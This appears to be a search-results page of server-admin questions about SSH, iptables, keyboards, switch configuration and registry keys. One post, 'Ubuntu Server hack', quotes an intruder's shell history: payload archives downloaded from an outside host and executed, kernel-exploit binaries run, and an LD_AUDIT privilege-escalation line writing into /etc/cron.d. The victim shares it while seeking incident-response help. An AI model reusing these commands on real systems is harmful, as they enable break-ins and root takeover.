Search Results

Search found 9446 results on 378 pages for 'ssh keys'.

Page 151/378 | < Previous Page | 147 148 149 150 151 152 153 154 155 156 157 158 | Next Page >

Are there any custom keyboard available for laptops

- by Ahe

My work laptop is a HP elitebook 8560w which I mainly use for programming. Usually I have a external keyboard but recently I have been working out of office and therefore have been using the laptops own keyboard. One thing has really started to bug me. The keyboard layout of this 15.6" laptop contains numpad but the arrow keys are really bad (too small). Also when programming, I really miss a standard inverted T-arrow keys and the home/end/PgUp/PgDn buttons. Then it occurred to me; I would rather give up a numpad than a standard arrow keys. (The keyboard real estate in 15.6" laptop would allow this, and I really have to agree with Jeff Atwood here http://www.codinghorror.com/blog/2009/02/have-keyboard-will-program.html) Which brings me to my question. Do any laptop manufacturers make custom keyboards for their laptops or is there some third party manufacturer who could supply these kind of special keyboards? Quick googling on this doesn't give any meaningful results. Looks like that I have to carry an external keyboard with me if someone here can't give any pointers.

Read the article
Configuring https access on HP A5120 Switch

- by GerryEgan

I am trying to configure HTTPS management on a HP a5120 switch running Version 5.20.99, Release 2215 and not having much luck. I have followed the manual by creating an SSL policy first and then enabling the HTTPS server with the SSL policy: ssl server-policy sslpol ip https ssl-server-policy sslpol ip https enable When I try and log onto the switch with Google Chrome I get the following error: Error 107 (net::ERR_SSL_PROTOCOL_ERROR): SSL protocol error. When I look this up I have found references to errors due to TLS being used in SSL. I can find no way to specify the SSL version in the server policy. The manual has a configuration example that uses MSCEP to retrieve a certificate but in Windows 2008 R2 that feature is only available in Enterprise and Datacentre editions which I don't have. I have SSH configured and it is using a locally generated certificate so I'm not sure if I can use that but I'd like to if possible. Has anybody been able to setup HTTPS management on HP A series switches without MSCEP? Any and all help appreciated! here is a copy of my config with the interfaces removed: version 5.20.99, Release 2215 # sysname MYSYSNAME # irf domain 10 irf mac-address persistent timer irf auto-update enable undo irf link-delay # domain default enable system # telnet server enable # vlan 1 # vlan 100 description Management # radius scheme system primary authentication 127.0.0.1 1645 primary accounting 127.0.0.1 1646 user-name-format without-domain # domain system access-limit disable state active idle-cut disable self-service-url disable # user-group system group-attribute allow-guest # local-user admin password cipher authorization-attribute level 3 service-type ssh telnet terminal service-type web # stp enable # ssl server-policy sslpol pki-domain MYDOMAIN # interface NULL0 # interface Vlan-interface199 ip address 192.168.199.140 255.255.255.0 # interface GigabitEthernet1/0/1 poe enable stp edged-port enable # interface Ten-GigabitEthernet2/1/2 # dhcp-snooping # ntp-service unicast-server 192.168.1.71 # ssh server enable # ip https ssl-server-policy sslpol ip https enable # load xml-configuration # user-interface aux 0 1 user-interface vty 0 15 authentication-mode scheme

Read the article
Unable to browse to apache service, Service is running

- by Jeff

Summary I have a very peculiar problem. I am not able to open the "It Works!" page after installing a fresh server with apache. I am able to ssh to the box (from outside the network). Apache seems to be running on my Centos6.4x86_64 box just fine. Nothing useful in /var/logs/httpd/*. What am I missing? The setup I am outside the network right now. The "server" is a VM on my home computer running bridged mode. public ip: A.B.C.D Host: 192.168.1.5 VM: 192.168.1.8 I have a verizon fios router that is forwarding ports 22, 80, and 8888 to the VM. I am able to ssh over port 22, but I am not able to browse to the public URL over port 80. so A.B.C.D:22 is working, but http://A.B.C.D:80 is not. What I've tried nmap to see if it is listening: nmap -sT -O localhost Starting Nmap 5.51 ( http://nmap.org ) at 2013-10-25 11:10 EDT Nmap scan report for localhost (127.0.0.1) Host is up (0.000040s latency). Other addresses for localhost (not scanned): 127.0.0.1 Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 3306/tcp open mysql I tried going to it locally (lynx) and it does work. So, is the problem in my ports?

Read the article
What is it safe to let Revo Uninstaller cleanup leftovers?

- by msorens

I have been a user of Revo Uninstaller (free) for sometime and find it does a very good cleanup job with typical applications. Today I wanted to clean up my machine a bit more so I proceeded to remove Visual Studio 2005 with Revo Uninstaller. The VS installer removed the app with no issues, then Revo reported about 20,000 leftover registry keys. I am used to basically just see Arpcache and Muicache... since I am not a registry expert I had no clue about most of the 20,000 listed. So I backed up the registry then let Revo remove the 20,000. It next reported about 1500 leftover files which included my Microsoft Office applications(!) that I knew it should not be touching. So I did not delete any files with Revo. Suspecting that some of the removed keys were also Office-related, I tried to open Word and Excel, both of which knew something was up, as the installer kicked in (albeit just briefly) for each of them. At this point, since I knew there were issues, I just restored the registry and I am now (seemingly) running OK. My question, then: When is it safe to trust Revo Uninstaller? As a seasoned software professional, my own answer to this would be the obvious "When the keys it reports are something you understand and know are safe to delete" but then that makes Revo of little use except to registry experts, does it not...?

Read the article
Ubuntu Server hack

- by haxpanel

Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

Read the article
Synergy Key Mapping

- by Tauren

I'm running a Synergy server on Ubuntu and a Synergy+ client on OSX. The server has a standard windows keyboard with shift, ctrl, windows, and alt keys. My MacBookPro has shift, fn, control, alt/option, and command keys. When I press ctrl-c, ctrl-v, etc, the appropriate copy/paste action doesn't happen on the Mac, but it does in Ubuntu. If I'm controlling the mac, and press alt-c, alt-v, then I get the copy/paste action. So I played around with key mapping in synergy.conf and found that the following allows me to do copy/paste with ctrl-c/ctrl-v: section: screens godzilla: mbp.local: ctrl = alt alt = ctrl end Is this all that I need to do? Or are there other mappings that will help as well? The synergy configuration page refers to the following key mappings. What are the equivalent keys for each of these on the Windows keyboard and Mac keyboard? What is a meta or super key? shift = {shift|ctrl|alt|meta|super|none} ctrl = {shift|ctrl|alt|meta|super|none} alt = {shift|ctrl|alt|meta|super|none} meta = {shift|ctrl|alt|meta|super|none} super = {shift|ctrl|alt|meta|super|none} Thanks!

Read the article
iptables -- OK, **now** am I doing it right?

- by Agvorth

This is a follow up to a previous question where I asked whether my iptables config is correct. CentOS 5.3 system. Intended result: block everything except ping, ssh, Apache, and SSL. Based on xenoterracide's advice and the other responses to the question (thanks guys), I created this script: # Establish a clean slate iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT iptables -F # Flush all rules iptables -X # Delete all chains # Disable routing. Drop packets if they reach the end of the chain. iptables -P FORWARD DROP # Drop all packets with a bad state iptables -A INPUT -m state --state INVALID -j DROP # Accept any packets that have something to do with ones we've sent on outbound iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT # Accept any packets coming or going on localhost (this can be very important) iptables -A INPUT -i lo -j ACCEPT # Accept ICMP iptables -A INPUT -p icmp -j ACCEPT # Allow ssh iptables -A INPUT -p tcp --dport 22 -j ACCEPT # Allow httpd iptables -A INPUT -p tcp --dport 80 -j ACCEPT # Allow SSL iptables -A INPUT -p tcp --dport 443 -j ACCEPT # Block all other traffic iptables -A INPUT -j DROP Now when I list the rules I get... # iptables -L -v Chain INPUT (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination 0 0 DROP all -- any any anywhere anywhere state INVALID 9 612 ACCEPT all -- any any anywhere anywhere state RELATED,ESTABLISHED 0 0 ACCEPT all -- lo any anywhere anywhere 0 0 ACCEPT icmp -- any any anywhere anywhere 0 0 ACCEPT tcp -- any any anywhere anywhere tcp dpt:ssh 0 0 ACCEPT tcp -- any any anywhere anywhere tcp dpt:http 0 0 ACCEPT tcp -- any any anywhere anywhere tcp dpt:https 0 0 DROP all -- any any anywhere anywhere Chain FORWARD (policy DROP 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 5 packets, 644 bytes) pkts bytes target prot opt in out source destination I ran it and I can still log in, so that's good. Anyone notice anything major out of wack?

Read the article
why Thinkpad T410s intermittent keyboard death?

- by patrickmdnet

I have a Thinkpad T410s running Windows 7 64-bit. I have had it for three months. It has the latest BIOS (1.41) and trackpad drivers. In the last week I have started to notice that the keyboard intermittently stops working. Specifically, keystrokes have no effect, including Fn-F12 (shutdown) and Ctrl-Alt-Del. The LED on the capslock key does not turn on or off. Whatever state the lighted keys (e.g. mute) were in remains. The trackpad and trackpoint work properly, and I can close apps and properly shut down the machine. When I attach a USB keyboard it is recognized, but no keys work. If I run the Lenovo keyboard test, all the keys register properly and the caps lock light works again. When I quit the test app, the caps lock light stops working. If I hit Fn-F12 while the keyboard test is running, it goes into hibernation. When the machine comes back from hibernation, once I exit the keyboard test I again cannot do any input on the keyboard. I'm pretty convinced there is a software or driver problem. I never saw this the first three months I had the laptop. I do not recall installing anything recently. I am sure I've received some Windows security updates. I tried using wired networking instead of wireless - no difference. There doesn't appear to be any inciting event; it usually happens when I am working over ssh. I switched from rxvt+ssh to Putty and the problem still occurs. Any ideas?

Read the article
Creating a pseudoterminal to make sudo happy

- by larsks

I need to automate the provisioning of a cloud instance (running Fedora 17) for which the following initial facts are true: I have ssh-key based access to a remote user (cloud) That user has password-free root access via sudo. Manual configuration is as simple as logging in and running sudo su - and having at it, but I would like to fully automate this process. The trick is that the system defaults to having the requiretty option enabled for sudo, which means that an attempt to do something like this: ssh remotehost sudo yum -y install puppet Will fail: sudo: sorry, you must have a tty to run sudo I am working around this right now by first pushing over a small Python script that will run a command on a pseudoterminal: import os import sys import errno import subprocess pid, master_fd = os.forkpty() if pid == 0: # child process: now that we're attached to a # pty, run the given command. os.execvp(sys.argv[1], sys.argv[1:]) else: while True: try: data = os.read(master_fd, 1024) except OSError, detail: if detail.errno == errno.EIO: break if not data: break sys.stdout.write(data) os.wait() Assuming that this is named pty, I can then run: ssh remotehost ./pty sudo yum -y install puppet This works fine, but I'm wondering if there are solutions already available that I haven't considered. I would normally think about expect, but it's not installed by default on this system. screen can do this in a pinch, but the best I came up with was: screen -dmS sudo somecommand ...which does work but eats the output. Are there any other tools available that will allocate a pseudoterminal for me that are going to be generally available?

Read the article
Run GUI application via cronjob in Ubuntu?

- by Christoffer

Hi, I have a remote server running "Ubuntu 10.04 Desktop". From it I want to run a script that walks through a list of websites and captures screenshots of them. The script is working and thoroughly tested. When I SSH to the server with ssh -X user@ip-adress I can run my script by calling ./myscript.py and everything will work OK. I then modifed my crontab file and added... 59 17 * * * env DISPLAY=:0 /path/to/myscript.py ...as recommended by the Ubuntu WIKI. I can see in the /var/log/syslog that my cron job is started, but it doesn't capture any screenshots. When running env DISPLAY=:0 /path/to/myscript.py from the shell I get No protocol specified myscript.py: cannot connect to X server :0 If I ssh to the server without the -X option I only get the second row of the error: myscript.py: cannot connect to X server :0 What can I try now? More details I have run xhost +local: and checked the output of xhost to see that the option was set correctly. If I run ls /tmp/.X11-unix/ the output is X0 The server only has one screen. Thank you in advance!

Read the article
Iptables rules, forward between two interfaces

- by Marco

i have a some difficulties in configuring my ubuntu server firewall ... my situation is this: eth0 - internet eth1 - lan1 eth2 - lan2 I want that clients from lan1 can't communicate with clients from lan2, except for some specific services. E.g. i want that clients in lan1 can ssh into client in lan2, but only that. Any other comunication is forbidden. So, i add this rules to iptables: #Block all traffic between lan, but permit traffic to internet iptables -I FORWARD -i eth1 -o ! eth0 -j DROP iptables -I FORWARD -i eth2 -o ! eth0 -j DROP # Accept ssh traffic from lan1 to client 192.168.20.2 in lan2 iptables -A FORWARD -i eth1 -o eth2 -p tcp --dport 22 -d 192.168.20.2 -j ACCEPT This didn't works. Doing iptables -L FORWARD -v i see: Chain FORWARD (policy DROP 0 packets, 0 bytes) pkts bytes target prot opt in out source destination 33 144 DROP all -- eth1 !eth0 anywhere anywhere 0 0 DROP all -- eth2 !eth0 anywhere anywhere 23630 20M ACCEPT all -- any any anywhere anywhere state RELATED,ESTABLISHED 0 0 ACCEPT all -- eth1 any anywhere anywhere 175 9957 ACCEPT all -- eth1 any anywhere anywhere 107 6420 ACCEPT all -- eth2 any anywhere anywhere 0 0 ACCEPT all -- pptp+ any anywhere anywhere 0 0 ACCEPT all -- tun+ any anywhere anywhere 0 0 ACCEPT tcp -- eth1 eth2 anywhere server2.lan tcp dpt:ssh All packets are dropped, and the count of packets for the last rule is 0 ... How i have to modify my configuration? Thank you. Regards Marco

Read the article
Centos iptables configuration for Wordpress and Gmail smtp

- by Fabrizio

Let me start off by saying that I'm a Centos newby, so all info, links and suggestions are very welcome! I recently set up a hosted server with Centos 6 and configured it as a webserver. The websites running on it are nothing special, just some low traffic projects. I tried to configure the server as default as possible, but I like it to be secure as well (no ftp, custom ssh port). Getting my Wordpress to run as desired, I'm running into some connection problems. 2 things are not working: installing plugins and updates through ssh2 (failed to connect to localhost:sshportnumber) sending emails from my site using the Gmail smtp (Failed to connect to server: Permission denied (13)) I have the feeling that these are both related to the iptables configuration, because I've tried everything else (I think). I tried opening up the firewall to accept traffic for ports 465 (gmail smtp) and ssh port (lets say this port is 8000), but both the issues remain. Ssh connections from the terminal are working fine though. After each change I tried implementing I restarted the iptables service. This is my iptables configuration (using vim): # Generated by iptables-save v1.4.7 on Sun Jun 1 13:20:20 2014 *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -p icmp -j ACCEPT -A INPUT -i lo -j ACCEPT -A INPUT -p tcp -m tcp --dport 8000 -j ACCEPT -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT -A INPUT -p tcp -m tcp --dport 465 -j ACCEPT -A INPUT -j REJECT --reject-with icmp-host-prohibited -A FORWARD -j REJECT --reject-with icmp-host-prohibited -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A OUTPUT -o lo -j ACCEPT -A OUTPUT -p tcp -m tcp --dport 8000 -j ACCEPT -A OUTPUT -p tcp -m tcp --dport 465 -j ACCEPT COMMIT # Completed on Sun Jun 1 13:20:20 2014 Are there any (obvious) issues with my iptables setup considering the above mentioned issues? Saying that the firewall is doing exactly nothing in this state is also an answer... And again, if you have any other suggestions for me to increase security (considering the basic things I do with this box), I would love hear it, also the obvious ones! Thanks!

Read the article
keyboard intermittently stops working, even after reinstalling windows 7; possibly a Chrome issue?

- by neverskipbreakfast

My keyboard intermittently stops working. Sometimes a couple of keys will work, but usually none. Sometimes if I mash a couple of the ctrl+alt+windows type keys randomly for a bit, the keyboard will let me type one more letter before stopping again. Sometimes the keys will open a program menu, but usually not. I have even completely wiped my machine and reinstalled windows 7; the problem continues. Specs: Intel iMac (early 2006, 2.0GHz, 2MB RAM, 240GB HD) running ONLY Windows 7 Professional, 32-bit (NOT through boot camp) and using a USB keyboard (Saitek Eclipse II.) *Unplugging & reconnecting keyboard does NOT fix it. *Connecting a different keyboard does NOT fix it. That one won't work, either. *Drivers are up-to-date. Removing and reinstalling drivers does NOT fix it. *Restarting the computer does NOT fix it. In fact, when the Windows logon screen appears, they keyboard won't work, and neither will the icon to pull up the on-screen keyboard. Otherwise my mouse can click around just fine. I can only log onto a non-password protected account. *Generally, logging into as different Windows user fixes it. I can then log back on to my main user account and continue work for a few hours until it happens again. *Clearing my Chrome browsing data stopped the problem from recurring for a week or so. *I use Avira free antivirus software, and repeated scans turn up nothing fishy. *I have already REINSTALLED Windows 7 (not just a restore.) The problem returned after 2 days of use. The only thing I suspect is something in Google Chrome -- I used my google account to reload all my previous Chrome extensions, saved data, etc. (Chrome Extensions Installed: AdBlock, Better Google Tasks, DropBox, FB Photo Zoom, Google Mail Checker, StayFocusd.) Any ideas? Any at all?

Read the article
Scripting a permanent CTRL / CAPS swap in Gnome?

- by Duncan Bayne

I have a bash script that I use to configure a vanilla Ubuntu (10.10 Maverick Meerkat) installation to be exactly the way I want it. I make extensive use of gconftool-2 to configure the desktop, set up shortcut keys, etc. Now, I'm trying to swap the CTRL and CAPS keys. I have found two ways of doing this: In Gnome, go to System - Preferences - Keyboard - Layout - Options and make the change in there. This works well, but I don't know how to script this; the setting doesn't seem to be stored in the usual place as I can't find it with gconf-editor. Add the line setxkbmap -option "ctrl:swapcaps" to my .bashrc file. That works too, until I suspend the machine & then resume it. At that point the CTRL and CAPS behaviour return to normal, until I cause .bashrc to be run again by opening a new shell. This behaviour has been reported as a bug in RedHat. Could someone please suggest a way of switching those keys that is both permanent, and can be scripted? I'm sure I must be missing something obvious here ...

Read the article
Trouble getting started with the STEALTH monitoring package

- by dlanced

Is anyone here familiar with the Linux-based STEALTH package (for monitoring FS integrity of client systems)? I'm trying to get started with a very simple configuration, but I'm running into trouble (this is running under Ubuntu 14.04): Config line `USE BASE/root/stealth/10.0.0.79' invalid STEALTH (2.11.02) started at Fri, 30 May 2014 15:25:00 +0000 Program terminated due to non-zero exit value for -type f -exec /usr/bin/sha1sum {} \; (EOC Fri May 30 15:25:00 2014 127) Stealth is creating a binary tmp file in the Stealth server root and generating a "report" file in the start directory, but not much else. Regarding the "USE BASE...invalid" error, and just to be sure, I manually created the directories in /root, but it didn't help. And, by the way, I am running stealth with sudo. Everything seems to be configured correctly: I'm able to ssh into root@client from the stealth machine without a password Here's my "policy" file (I've removed the email directives just for simplicity): DEFINE SSHCMD /usr/bin/ssh [email protected] -T -q exec /bin/bash --noprofile DEFINE EXECSHA1 -xdev -perm +u+s,g+s ( -user root -or -group root ) \ -type f -exec /usr/bin/sha1sum {} \; USE BASE/root/stealth/10.0.0.79 USE SSH ${SSHCMD} USE DD /bin/dd USE DIFF /usr/bin/diff USE PIDFILE /var/run/stealth- USE REPORT report USE SH /bin/sh GET /usr/bin/sha1sum /root/tmp LABEL \nchecking the client's /usr/bin/find program CHECK LOG = remote/binfind /usr/bin/sha1sum /usr/bin/find LABEL \nsuid/sgid/executable files uid or gid root on the / partition CHECK LOG = remote/setuidgid /usr/bin/find / ${EXECSHA1} LABEL \nconfiguration files under /etc CHECK LOG = remote/etcfiles \ /usr/bin/find /etc -type f -not -perm /6111 \ -not -regex "/etc/(adjtime\|mtab)"\ -exec /usr/bin/sha1sum {} \; Any ideas? Thanks,

Read the article
Windows 7 can't find Ubuntu computer by hostname

- by endolith

I got a new Windows 7 machine, and was using VNC, SSH etc to connect to my Ubuntu machine, and it worked fine previously connecting to the Ubuntu computer's hostname. Now it doesn't work if I use the machine's hostname, but it does if I use the local IP or DynDNS name. I can also access it from my Android phone using the local hostname over SSH. If I try to connect with SSH to the hostname, it says "Host does not exist". VNC says "Failed to get server address". NX says "no address associated with name", and I don't see it in Windows' "Network" folder. I've rebooted everything. I've turned off Windows firewall. It was working fine a few days ago, but now it's not. How do I figure out what's blocking it? Aha: It probably has something to do with Samba. I reset the Samba configuration the other day, and apparently this can affect it. http://ubuntu-virginia.ubuntuforums.org/showthread.php?t=1558925 I tried commenting out "encrypt passwords = No" as described there, but it still doesn't work.

Read the article
Is this a good starting point for iptables in Linux?

- by sbrattla

Hi, I'm new to iptables, and i've been trying to put together a firewall which purpose is to protect a web server. The below rules are the ones i've put together so far, and i would like to hear if the rules makes sense - and wether i've left out anything essential? In addition to port 80, i also need to have port 3306 (mysql) and 22 (ssh) open for external connections. Any feedback is highly appreciated! #!/bin/sh # Clear all existing rules. iptables -F # ACCEPT connections for loopback network connection, 127.0.0.1. iptables -A INPUT -i lo -j ACCEPT # ALLOW established traffic iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # DROP packets that are NEW but does not have the SYN but set. iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP # DROP fragmented packets, as there is no way to tell the source and destination ports of such a packet. iptables -A INPUT -f -j DROP # DROP packets with all tcp flags set (XMAS packets). iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP # DROP packets with no tcp flags set (NULL packets). iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP # ALLOW ssh traffic (and prevent against DoS attacks) iptables -A INPUT -p tcp --dport ssh -m limit --limit 1/s -j ACCEPT # ALLOW http traffic (and prevent against DoS attacks) iptables -A INPUT -p tcp --dport http -m limit --limit 5/s -j ACCEPT # ALLOW mysql traffic (and prevent against DoS attacks) iptables -A INPUT -p tcp --dport mysql -m limit --limit 25/s -j ACCEPT # DROP any other traffic. iptables -A INPUT -j DROP

Read the article
AutoHotKey temporarily rebind Winkey

- by wes

I've got a wireless keyboard that puts some media keys on top of the Function keys, so that by default F4 is actually lock (Rwin & l) and Fn+F4 is a real F4. So I'd like to basically switch those around. Here's what the key history shows: VK SC Type Up/Dn Elapsed Key ------------------------------------- 73 03E d 17.32 F4 ; Fn+F4 73 03E u 0.16 F4 5C 15C d 2.96 Right Windows ; F4 4C 026 d 0.00 L 5C 15C u 0.13 Right Windows 4C 026 u 0.00 L This doesn't do anything: SC15C & SC026::MsgBox,Pressed F4 But this prints that I hit F4 then goes to the login screen: Rwin & l::MsgBox,Pressed F4 So how can I stop it from switching to the login screen? Ideally I'd like F4 (which registers as Rwin & l) to just send F4, Fn+F4 to send Rwin & l, and also have them work with other keys (e.g., a manual !F4 should still close a window). Is this possible?

Read the article
Not able to connect to port different than 22 - OpenVPN

- by t8h7gu

I have OpenVPN network with 5 clients. Computer with Arch Linux which hosts OpenVPN server, It also hosts virtual machine with Computer with CentOS which is also connnected to OpenVPN subnet. Windows 8 which hosts virtual machine with CentOS. Both of them are connected to OpenVPN. Last one machine is virtual machine with CentOS which is hosted by computer with Ubuntu 14( which is not connected to OpenVPN. All machines in OpenVPN subnet are bolded. All phisical computers are in different networks. The problem is that when I use nmap to scan Windows and it's guest virtual machine it's saids that host seems down. When I force namp to scan specific port it shows filtered state: nmap -Pn -p 50010 n3 Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-07 19:49 CEST Nmap scan report for n3 (10.8.0.3) Host is up (0.11s latency). rDNS record for 10.8.0.3: node3.com PORT STATE SERVICE 50010/tcp filtered unknown Telnet also cannot connect to this port telnet n3 50010 Trying 10.8.0.3... telnet: Unable to connect to remote host: No route to host But ss on this host show's proper state of this port ss -anp | grep 50010 LISTEN 0 50 10.8.0.3:50010 *:* users:(("java",12310,271)) What might be possible reason of that and how to fix it? EDIT I've found that I am able to connect via telnet to ssh port: telnet n3 22 Trying 10.8.0.3... Connected to n3. Escape character is '^]'. SSH-2.0-OpenSSH_5.3 So it seems that it's not problem with Windows firewall. But I have no idea what it might be. Also nmap result for first thousand ports: nmap -Pn -p 1-1000 n3 Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-07 20:08 CEST Nmap scan report for n3 (10.8.0.3) Host is up (0.49s latency). rDNS record for 10.8.0.3: node3.com Not shown: 999 filtered ports PORT STATE SERVICE 22/tcp open ssh Nmap done: 1 IP address (1 host up) scanned in 77.87 seconds

Read the article
Cant ping ip on LAN. Port forward works fine though.

- by Anoop

I have a Solaris 11 machine running inside the LAN. It is a default install. I can access the machine and ping it if I ssh into my router (if it matters, it is running dd-wrt). I cannot ping the Solaris machine using ip address from any other machine inside the LAN. But if I setup port forwarding everything works perfectly fine. I can also use the port forward from outside the LAN (from my office) - which is good and how I want it to be. I can SSH and ping and do pretty much everything else from outside as well as inside but only as long as I have the port forwarded from my router. Why would I not be able to ping or ssh or even access the Solaris 11 machine from within the LAN - I have checked and couldn't find any firewall running on the Solaris 11 box. I even tried disabling every known firewall on the router (dd-wrt, it had something like SPI firewall running). I even tried setting a static IP for my Solaris box but all in vain! Please help me understand how and why this happens!! Thanks.

Read the article
Is this a legitimate registry key? (windows 7)

- by Keyes

In hkey_local_machine/software/classes I found some registry keys named msime.taiwan, msime.japan and a couple others with similar names, except with a number at the end of, so there was 4 keys altogether. From what I know itmcoulc be associated with a thing in windows that lets you write japanese characters or whatever. I also found a macaffee page, , which seemed dated but it said the key is created by a virus named w32 virut. Just wondering is this a legit key? I found it on another pc and both pcs show when exported to a .txt show it was last written to in 2009. Here is the reg query for the 4 keys. (added lines to differentiate them.) HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Japan (Default) REG_SZ Microsoft IME (Japanese) HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Japan\CLSID (Default) REG_SZ {6A91029E-AA49-471B-AEE7-7D332785660D} HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Japan\CurVer (Default) REG_SZ MSIME.Japan.11 HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Japan.11 (Default) REG_SZ Microsoft IME (Japanese) HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Japan.11\CLSID (Default) REG_SZ {6A91029E-AA49-471B-AEE7-7D332785660D} HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Taiwan\CLSID (Default) REG_SZ {F407D01A-0BCB-4591-9BD6-EA4A71DF0799} HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Taiwan\CurVer (Default) REG_SZ MSIME.Taiwan.8 HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Taiwan.8 (Default) REG_SZ IMTCCORE HKEY_LOCAL_MACHINE\Software\Classes\MSIME.Taiwan.8\CLSID (Default) REG_SZ {F407D01A-0BCB-4591-9BD6-EA4A71DF0799}

Read the article
Switch between network configurations via command line in fedora 17

- by Mike Fairhurst

I have two different setups I use on my work laptop; one enables synergy over an ethernet ssh tunnel with my work computer on the local network, and the other opens an HTTP tunnel to my work computer from outside the network. When I have wifi enabled at work, my laptop seems to use it by preference. This makes synergy run incredibly slowly. At home I must use wifi. I have scripts that begin my ssh tunnels, add my ssh keys, and starts up other programs like synergy, and close themselves when I shut my laptop. However, every day I have to start out my routine by opening my gnome-control-center and turning on my ethernet. I have tried route add and ifup, none of it works, so I dove into gnome-control-center's source code and found that it enabled the connection by libnm's method nm_client_activate_connection with some libnm specific structs that I am having trouble tracking down. I'm not much of a c programmer, and I'm not familiar with either GTK or libnm. Does anybody know what fedora 17 does with ethernet connections to fully enable them? Or does anybody know what libnm does to fully enable an ethernet connection? Do I have to write a c script to run libnm for me to fully emulate whatever gnome-control-center is trying to do?

Read the article
Server needs to ping outgoing before allowing connection

- by QuintenVK

Okay, first our setup: I'm currently working over VPN to a mac mini OSX 10.6 server. We have a testsetup VM running on that, using ubuntu 12.04. Earlier today, there was an outage because of which our mac mini server was reset. Since then, i was unable to initiate a connection to the VM (which i did boot) -- no ssh, no web, ... . I couldn't ssh or web from the mac mini to the vm either. I could do so from within the VM itself, though. Ping did work on all machines. Lastly, I tried pinging from the VM to my laptop. It took a moment, but then it finally started to ping (no timeouts or so). After that, web and ssh magically worked. I then didn't use the machine for about 5 minutes, after which i had to ping from the server to my laptop again before i could setup a connection. I'm in the dark on what this could be, though I think this is something to do with lookups.

Read the article
Getting the EFS Private Key out of system image

- by thaimin

I had to recently re-install Windows 7 and I lost my exported private key for EFS. I however have the entirety of my user directory and my figuring that the key must be in there SOMEWHERE. The only question is how to get it out. I did find the PUBLIC keys in AppData\Roaming\Microsoft\SystemCertificates\My\Certificates If I import them using certmg.msc it says I do have the private key in the information, but if I try export them it says I do not have the private key. Also, decryption of files doesn't work. There is also a "keys" folder at AppData\Roaming\Microsoft\SystemCertificates\My\Keys. After importing the certificates I copy those over into my new installation but it has no effect. I am starting to believe they are either in AppData\Roaming\Microsoft\Protect\S-1-5-21-...\ or AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-...\ but I am unsure how to use the files in those folders. Also, since my SID has changed, will I be able to use them? The other parts of the account have remained the same (name and password). I also have complete access to the user registry hive and most of the old system files (including the old system registry hives). I do keep seeing references to "Key Recovery Agent" but have not found anything about using, just that it can be used. Thanks!

Read the article
Sed: Deleting all content matching a pattern

- by Svish

I have some plist files on mac os x that I would like to shrink. They have a lot of <dict> with <key> and values. One of these keys is a thumbnail which has a <data> value with base64 encoded binary (I think). I would like to remove this key and value. I was thinking this could maybe be done by sed, but I don't really know how to use it and it seems like sed only works on a line-by-line basis? Either way I was hoping someone could help me out. In the file I would like to delete everything that matches the following pattern or something close to that: <key>Thumbnail<\/key>[^<]*<\/data> In the file it looks like this: // Other keys and values <key>Thumbnail</key> <data> TU0AKgAAOEi25Pqx3/ip2fak0vOdzPCVxu2RweuPv+mLu+mIt+aGtuaEtOSB ... dCBBcHBsZSBDb21wdXRlciwgSW5jLiwgMjAwNQAAAAA= </data> // Other keys and values Anyone know how I could do this? Also, if there are any better tools that I can use in the terminal to do this, I would like to know about that as well :)

Read the article

< Previous Page | 147 148 149 150 151 152 153 154 155 156 157 158 | Next Page >